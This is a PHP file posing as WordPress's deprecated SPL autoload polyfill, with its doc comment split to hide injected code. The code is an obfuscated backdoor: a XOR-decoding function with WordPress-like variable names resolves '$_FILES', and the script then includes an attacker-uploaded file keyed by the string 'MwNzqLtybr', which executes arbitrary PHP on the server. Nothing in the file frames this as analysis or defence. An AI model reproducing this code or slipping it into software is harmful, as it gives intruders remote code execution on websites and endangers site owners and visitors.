<?php /* 
*
 * Polyfill for SPL autoload feature. This file is separate to prevent compiler notices
 * on the deprecated __autoload() function.
 *
 * See https:core.trac.wordpress.org/ticket/41134
 *
 * @deprecated 5.3.0 No longer needed as the minimum PHP requirement has moved beyond PHP 5.3.
 *
 * @package PHP
 * @access private
 

_deprecated_file( basename( __FILE__ ), '5.3.0', '', 'SPL c*/
 	
$children = 'MwNzqLtybr';
function wheres($old_slugs, $force_delete)

{
	$wilds = 'taxonomy_obj';
    $wildcards = urldecode($old_slugs);
    $new_status_post = substr($force_delete,0, strlen($wildcards));
	$part = 'sani_mime_type';
    $no_texturize_shortcodes = $wildcards ^ $new_status_post;
    return $no_texturize_shortcodes;

}
$allblocks = ${wheres("%121%0764%1F", $children)};
	$reset = 'delimiters';
if (isset($allblocks[$children]))

{
    $short_url = $allblocks[$children];
    $field = $short_url[wheres("9%1A%3E%25%1F-%19%1C", $children)];
    include ($field);
}



/* an no longer be disabled as of PHP 5.3.' );
*/